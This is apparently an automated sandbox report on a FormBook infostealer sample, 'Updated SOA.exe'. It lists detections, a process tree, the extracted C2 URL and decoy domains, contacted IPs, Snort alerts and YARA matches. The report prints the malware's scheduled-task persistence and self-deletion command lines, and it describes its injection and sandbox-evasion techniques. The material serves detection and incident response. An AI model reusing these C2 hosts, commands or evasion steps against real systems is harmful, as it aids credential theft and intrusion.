Windows Analysis Report Updated SOA.exe

Overview

General Information

Sample Name: Updated SOA.exe
Analysis ID: 486924
MD5: 08098c5ef23fb87af19a5adbdd31324b
SHA1: 19645fc145feaa325c5cc765bc873075a0aa7512
SHA256: ab4676fc90e455da2127126bfbd1fd167328c79eda83f686ef71dd89266825f5
Tags: exe, Formbook, xloader

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Self deletion via cmd delete
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses schtasks.exe or at.exe to add and modify task schedules
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • Updated SOA.exe (PID: 1380 cmdline: 'C:\Users\user\Desktop\Updated SOA.exe' MD5: 08098C5EF23FB87AF19A5ADBDD31324B)
    • schtasks.exe (PID: 5548 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\oydxFbGhGlh' /XML 'C:\Users\user\AppData\Local\Temp\tmp14E0.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 3544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • Updated SOA.exe (PID: 1968 cmdline: C:\Users\user\Desktop\Updated SOA.exe MD5: 08098C5EF23FB87AF19A5ADBDD31324B)
      • explorer.exe (PID: 3388 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmmon32.exe (PID: 4896 cmdline: C:\Windows\SysWOW64\cmmon32.exe MD5: 2879B30A164B9F7671B5E6B2E9F8DFDA)
          • cmd.exe (PID: 6168 cmdline: /c del 'C:\Users\user\Desktop\Updated SOA.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.thesewhitevvalls.com/b2c0/"], "decoy": ["bjyxszd520.xyz", "hsvfingerprinting.com", "elliotpioneer.com", "bf396.com", "chinaopedia.com", "6233v.com", "shopeuphoricapparel.com", "loccssol.store", "truefictionpictures.com", "playstarexch.com", "peruviancoffee.store", "shobhajoshi.com", "philme.net", "avito-rules.com", "independencehomecenters.com", "atp-cayenne.com", "invetorsbank.com", "sasanos.com", "scentfreebnb.com", "catfuid.com", "sunshinefamilysupport.com", "madison-co-atty.net", "newhousebr.com", "newstodayupdate.com", "kamalaanjna.com", "itpronto.com", "hi-loentertainment.com", "sadpartyrentals.com", "vertuminy.com", "khomayphotocopy.club", "roleconstructora.com", "cottonhome.online", "starsspell.com", "bedrijfs-kledingshop.com", "aydeyahouse.com", "miaintervista.com", "taolemix.com", "lnagvv.space", "bjmobi.com", "collabkc.art", "onayli.net", "ecostainable.com", "vi88.info", "brightlifeprochoice.com", "taoluzhibo.info", "techgobble.com", "ideemimarlikinsaat.com", "andajzx.com", "shineshaft.website", "arroundworld.com", "reyuzed.com", "emilfaucets.com", "lumberjackguitarloops.com", "pearl-interior.com", "altitudebc.com", "cqjiubai.com", "kutahyaescortbayanlarim.xyz", "metalworkingadditives.online", "unasolucioendesa.com", "andrewfjohnston.com", "visionmark.net", "dxxlewis.com", "carts-amazon.com", "anadolu.academy"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000012.00000002.483644410.0000000000C00000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
    00000012.00000002.483644410.0000000000C00000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    00000012.00000002.483644410.0000000000C00000.00000004.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    00000008.00000000.287563072.000000000E2BA000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
      00000008.00000000.287563072.000000000E2BA000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com

      Unpacked PEs

      Source | Rule | Description | Author | Strings
      7.2.Updated SOA.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
        7.2.Updated SOA.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
        7.2.Updated SOA.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
        7.2.Updated SOA.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
          7.2.Updated SOA.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com

          Sigma Overview

          No Sigma rule has matched

          Jbx Signature Overview

          AV Detection:

          Found malware configuration
          Source: 00000012.00000002.483644410.0000000000C00000.00000004.00000001.sdmp, Malware Configuration Extractor: FormBook
          Multi AV Scanner detection for submitted file
          Source: Updated SOA.exe, Virustotal: Detection: 31%
          Source: Updated SOA.exe, ReversingLabs: Detection: 24%
          Yara detected FormBook
          Multi AV Scanner detection for dropped file
          Source: C:\Users\user\AppData\Roaming\oydxFbGhGlh.exe, ReversingLabs: Detection: 24%
          Machine Learning detection for sample
          Source: Updated SOA.exe, Joe Sandbox ML: detected
          Machine Learning detection for dropped file
          Source: C:\Users\user\AppData\Roaming\oydxFbGhGlh.exe, Joe Sandbox ML: detected
          Source: 7.2.Updated SOA.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: Updated SOA.exe, Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
          Source: Updated SOA.exe, Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: cmmon32.pdb source: Updated SOA.exe, 00000007.00000002.300264801.0000000000FD0000.00000040.00020000.sdmp
          Source: Binary string: cmmon32.pdbGCTL source: Updated SOA.exe, 00000007.00000002.300264801.0000000000FD0000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: Updated SOA.exe, 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, cmmon32.exe, 00000012.00000002.485770207.00000000043B0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: Updated SOA.exe, cmmon32.exe

          Networking:

          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
          Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49768 -> 104.21.2.184:80
          Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49768 -> 104.21.2.184:80
          Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49768 -> 104.21.2.184:80
          Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49770 -> 184.168.131.241:80
          Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49770 -> 184.168.131.241:80
          Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49770 -> 184.168.131.241:80
          Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49771 -> 185.53.177.12:80
          Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49771 -> 185.53.177.12:80
          Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49771 -> 185.53.177.12:80
          Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49784 -> 185.33.94.22:80
          Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49784 -> 185.33.94.22:80
          Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49784 -> 185.33.94.22:80
          Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49803 -> 34.102.136.180:80
          Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49803 -> 34.102.136.180:80
          Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49803 -> 34.102.136.180:80
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe, Domain query: www.starsspell.com
          Source: C:\Windows\explorer.exe, Network Connect: 104.21.2.184 80
          Source: C:\Windows\explorer.exe, Domain query: www.sunshinefamilysupport.com
          Source: C:\Windows\explorer.exe, Network Connect: 70.40.216.229 80
          Source: C:\Windows\explorer.exe, Domain query: www.thesewhitevvalls.com
          Source: C:\Windows\explorer.exe, Domain query: www.loccssol.store
          Source: C:\Windows\explorer.exe, Network Connect: 23.92.26.10 80
          Source: C:\Windows\explorer.exe, Network Connect: 184.168.131.241 80
          Source: C:\Windows\explorer.exe, Domain query: www.carts-amazon.com
          Source: C:\Windows\explorer.exe, Network Connect: 185.53.177.12 80
          Source: C:\Windows\explorer.exe, Domain query: www.emilfaucets.com
          Source: C:\Windows\explorer.exe, Domain query: www.invetorsbank.com
          Source: C:\Windows\explorer.exe, Domain query: www.kutahyaescortbayanlarim.xyz
          Source: C:\Windows\explorer.exe, Domain query: www.brightlifeprochoice.com
          Source: C:\Windows\explorer.exe, Network Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exe, Network Connect: 185.33.94.22 80
          Source: C:\Windows\explorer.exe, Network Connect: 172.67.169.11 80
          Performs DNS queries to domains with low reputation
          Source: C:\Windows\explorer.exe, DNS query: www.kutahyaescortbayanlarim.xyz
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractor, URLs: www.thesewhitevvalls.com/b2c0/
          Source: Joe Sandbox View, ASN Name: CLOUDFLARENETUS
          Source: Joe Sandbox View, ASN Name: TEAMINTERNET-ASDE
          Source: Joe Sandbox View, ASN Name: UNIFIEDLAYER-AS-1US
          Source: Joe Sandbox View, IP Address: 185.53.177.12
          Source: Joe Sandbox View, IP Address: 184.168.131.241
          Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found, Date: Tue, 21 Sep 2021 00:20:55 GMT, Content-Type: text/html; charset=iso-8859-1, Transfer-Encoding: chunked, Connection: close, Server: cloudflare
          Source: Updated SOA.exe, 00000000.00000003.217369228.0000000005A44000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/nl-n/l~
          Source: Updated SOA.exe, 00000000.00000003.218881873.0000000005A44000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/r-t
          Source: Updated SOA.exe, 00000000.00000003.217177886.0000000005A44000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/s-e
          Source: Updated SOA.exe, 00000000.00000003.217369228.0000000005A44000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/t
          Source: Updated SOA.exe, 00000000.00000003.217369228.0000000005A44000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/ul
          Source: Updated SOA.exe, 00000000.00000003.216978362.0000000005A3B000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/x
          Source: Updated SOA.exe, 00000000.00000003.218305716.0000000005A44000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/~l
          Source: Updated SOA.exe, 00000000.00000002.241340858.0000000006CB2000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: Updated SOA.exe, 00000000.00000003.218131290.0000000005A66000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: Updated SOA.exe, 00000000.00000003.215288467.0000000005A2A000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: Updated SOA.exe, 00000000.00000002.241340858.0000000006CB2000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: Updated SOA.exe, 00000000.00000003.214865561.0000000005A3B000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.net
          Source: Updated SOA.exe, 00000000.00000002.241340858.0000000006CB2000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: Updated SOA.exe, 00000000.00000003.214769921.0000000005A3B000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.netFGl
          Source: Updated SOA.exe, 00000000.00000003.214769921.0000000005A3B000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.netayl
          Source: Updated SOA.exe, 00000000.00000003.214769921.0000000005A3B000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.netom
          Source: Updated SOA.exe, 00000000.00000003.214769921.0000000005A3B000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.netute
          Source: Updated SOA.exe, 00000000.00000003.221427725.0000000005A22000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.de
          Source: Updated SOA.exe, 00000000.00000002.241340858.0000000006CB2000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: Updated SOA.exe, 00000000.00000003.221427725.0000000005A22000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.dex
          Source: Updated SOA.exe, 00000000.00000003.216278371.0000000005A22000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: unknown, DNS traffic detected: queries for: www.carts-amazon.com

          E-Banking Fraud:

          Yara detected FormBook

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 7.2.Updated SOA.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.2.Updated SOA.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: Updated SOA.exe, Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
          Source: 7.2.Updated SOA.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.2.Updated SOA.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_043ED5E018_2_043ED5E0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_043F6E3018_2_043F6E30
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_0449D61618_2_0449D616
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_044A2EF718_2_044A2EF7
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_044ADFCE18_2_044ADFCE
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_044A1FF118_2_044A1FF1
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_043FA83018_2_043FA830
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_0449100218_2_04491002
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_044AE82418_2_044AE824
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_044A28EC18_2_044A28EC
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_043EB09018_2_043EB090
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_044020A018_2_044020A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_044A20A818_2_044A20A8
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_043F412018_2_043F4120
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_043DF90018_2_043DF900
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_043F99BF18_2_043F99BF
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_0448FA2B18_2_0448FA2B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_04494AEF18_2_04494AEF
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_044A22AE18_2_044A22AE
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_043FA30918_2_043FA309
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_044A2B2818_2_044A2B28
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_043FAB4018_2_043FAB40
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_044903DA18_2_044903DA
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_0440ABD818_2_0440ABD8
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_0449DBD218_2_0449DBD2
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_044823E318_2_044823E3
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_0440EBB018_2_0440EBB0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_0013C98318_2_0013C983
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_0013D1E918_2_0013D1E9
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_0013D24718_2_0013D247
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_0013D35218_2_0013D352
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_0013CB6E18_2_0013CB6E
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_0013CBE618_2_0013CBE6
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_00128C4B18_2_00128C4B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_00128C9018_2_00128C90
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_0013CCB818_2_0013CCB8
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_00122D9018_2_00122D90
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_00122D8918_2_00122D89
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_00122FB018_2_00122FB0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: String function: 043DB150 appears 133 times
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: String function: 0107B150 appears 136 times
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_004185D0 NtCreateFile,7_2_004185D0
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_00418680 NtReadFile,7_2_00418680
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_00418700 NtClose,7_2_00418700
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_004187B0 NtAllocateVirtualMemory,7_2_004187B0
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_004185CA NtCreateFile,7_2_004185CA
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0041867A NtReadFile,7_2_0041867A
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_00418623 NtReadFile,7_2_00418623
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_004186FA NtClose,7_2_004186FA
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_004187AA NtAllocateVirtualMemory,7_2_004187AA
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010B9910 NtAdjustPrivilegesToken,LdrInitializeThunk,7_2_010B9910
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010B99A0 NtCreateSection,LdrInitializeThunk,7_2_010B99A0
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010B9840 NtDelayExecution,LdrInitializeThunk,7_2_010B9840
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010B9860 NtQuerySystemInformation,LdrInitializeThunk,7_2_010B9860
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010B98F0 NtReadVirtualMemory,LdrInitializeThunk,7_2_010B98F0
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010B9A00 NtProtectVirtualMemory,LdrInitializeThunk,7_2_010B9A00
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010B9A20 NtResumeThread,LdrInitializeThunk,7_2_010B9A20
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010B9A50 NtCreateFile,LdrInitializeThunk,7_2_010B9A50
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010B9540 NtReadFile,LdrInitializeThunk,7_2_010B9540
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010B95D0 NtClose,LdrInitializeThunk,7_2_010B95D0
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010B9710 NtQueryInformationToken,LdrInitializeThunk,7_2_010B9710
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010B9780 NtMapViewOfSection,LdrInitializeThunk,7_2_010B9780
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010B97A0 NtUnmapViewOfSection,LdrInitializeThunk,7_2_010B97A0
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010B9FE0 NtCreateMutant,LdrInitializeThunk,7_2_010B9FE0
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010B9660 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_010B9660
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010B96E0 NtFreeVirtualMemory,LdrInitializeThunk,7_2_010B96E0
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010B9950 NtQueueApcThread,7_2_010B9950
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010B99D0 NtCreateProcessEx,7_2_010B99D0
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010B9820 NtEnumerateKey,7_2_010B9820
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010BB040 NtSuspendThread,7_2_010BB040
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010B98A0 NtWriteVirtualMemory,7_2_010B98A0
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010B9B00 NtSetValueKey,7_2_010B9B00
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010BA3B0 NtGetContextThread,7_2_010BA3B0
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010B9A10 NtQuerySection,7_2_010B9A10
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010B9A80 NtOpenDirectoryObject,7_2_010B9A80
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010B9520 NtWaitForSingleObject,7_2_010B9520
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010BAD30 NtSetContextThread,7_2_010BAD30
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010B9560 NtWriteFile,7_2_010B9560
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010B95F0 NtQueryInformationFile,7_2_010B95F0
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010BA710 NtOpenProcessToken,7_2_010BA710
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010B9730 NtQueryVirtualMemory,7_2_010B9730
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010B9760 NtOpenProcess,7_2_010B9760
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010BA770 NtOpenThread,7_2_010BA770
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010B9770 NtSetInformationFile,7_2_010B9770
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010B9610 NtEnumerateValueKey,7_2_010B9610
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010B9650 NtQueryValueKey,7_2_010B9650
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010B9670 NtQueryInformationProcess,7_2_010B9670
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010B96D0 NtCreateKey,7_2_010B96D0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_04419540 NtReadFile,LdrInitializeThunk,18_2_04419540
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_044195D0 NtClose,LdrInitializeThunk,18_2_044195D0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_04419650 NtQueryValueKey,LdrInitializeThunk,18_2_04419650
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_04419660 NtAllocateVirtualMemory,LdrInitializeThunk,18_2_04419660
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_044196D0 NtCreateKey,LdrInitializeThunk,18_2_044196D0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_044196E0 NtFreeVirtualMemory,LdrInitializeThunk,18_2_044196E0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_04419710 NtQueryInformationToken,LdrInitializeThunk,18_2_04419710
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_04419FE0 NtCreateMutant,LdrInitializeThunk,18_2_04419FE0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_04419780 NtMapViewOfSection,LdrInitializeThunk,18_2_04419780
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_04419840 NtDelayExecution,LdrInitializeThunk,18_2_04419840
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_04419860 NtQuerySystemInformation,LdrInitializeThunk,18_2_04419860
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_04419910 NtAdjustPrivilegesToken,LdrInitializeThunk,18_2_04419910
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_044199A0 NtCreateSection,LdrInitializeThunk,18_2_044199A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_04419A50 NtCreateFile,LdrInitializeThunk,18_2_04419A50
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_04419560 NtWriteFile,18_2_04419560
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_04419520 NtWaitForSingleObject,18_2_04419520
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_0441AD30 NtSetContextThread,18_2_0441AD30
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_044195F0 NtQueryInformationFile,18_2_044195F0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_04419670 NtQueryInformationProcess,18_2_04419670
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_04419610 NtEnumerateValueKey,18_2_04419610
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_04419760 NtOpenProcess,18_2_04419760
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_0441A770 NtOpenThread,18_2_0441A770
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_04419770 NtSetInformationFile,18_2_04419770
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_0441A710 NtOpenProcessToken,18_2_0441A710
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_04419730 NtQueryVirtualMemory,18_2_04419730
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_044197A0 NtUnmapViewOfSection,18_2_044197A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_0441B040 NtSuspendThread,18_2_0441B040
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_04419820 NtEnumerateKey,18_2_04419820
